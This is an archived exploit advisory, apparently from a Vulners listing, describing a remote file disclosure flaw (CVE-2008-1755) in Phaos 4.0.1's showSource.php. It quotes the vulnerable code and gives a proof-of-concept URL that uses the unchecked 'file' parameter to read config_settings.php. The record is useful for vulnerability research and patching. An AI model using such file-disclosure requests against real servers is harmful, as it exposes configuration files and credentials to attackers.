Lucene search
+L

Phaos R4000 Version - 'file' Remote File Disclosure

🗓️ 09 Apr 2008 00:00:00Reported by HaCkeR_EgYType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 40 Views

Phaos R4000 Version - 'file' Remote File Disclosure vulnerability in phaos4.0.1 showSource.ph

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-1755
9 Apr 200800:00
circl
cve
CVE
CVE-2008-1755
11 Apr 200820:28
cve
cvelist
Cvelist
CVE-2008-1755
11 Apr 200820:28
cvelist
euvd
EUVD
EUVD-2008-1755
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-1755
11 Apr 200821:05
nvd
prion
Prion
Directory traversal
11 Apr 200821:05
prion
####################################################################################
                                          }}} Remote File Disclosure Vulnerability {{{

                                                  in (showSource.php)  phaos4.0.1

       MY HOmE :  WWW.PAL-HACkEr.COM                                        WWW.ATSDP.COM
####################################################################################
## AUTHOR :  HaCkeR_EgY
## My HoMe :  www.PaL-HaCker.com  &   www.ATSDP.com
## ConTacT :  [email protected]
-----------------------------------------------
## script: phaos4.0.1
##download:http://sourceforge.net/project/showfiles.php?group_id=111506
###################################################################
### vurn C0dE :

## line 16:

 showSource($file, $line, $prev, $next);  <=====
function showSource($file, $line, $prev = 10, $next = 10) {

    if (!(file_exists($file) && is_file($file))) {
        return trigger_error("showSource() failed, file does not exist `$file`", E_USER_ERROR);
        return false;
    }

    //read code
## line 35 :   ob_start();
    highlight_file($file); <<========
    $data = ob_get_contents();
    ob_end_clean();

## P0C:
            http://localhost/[path]/erorr/showSource.php?file=config_settings.php

#################################################################################

## GREETZ TO :   My BrOther and My MasTer   " Abo Mohamed "   ADMIN PAL-HACKER

##  Thanx     : F0UaD Pr0gRaMeR  , FiReSell  , MoHamed EL Arab  ,  Mr.exe  ,  zaradusht  , and all " pal-hacker members "

#####################################################################################

# milw0rm.com [2008-04-09]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Nov 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.02672
40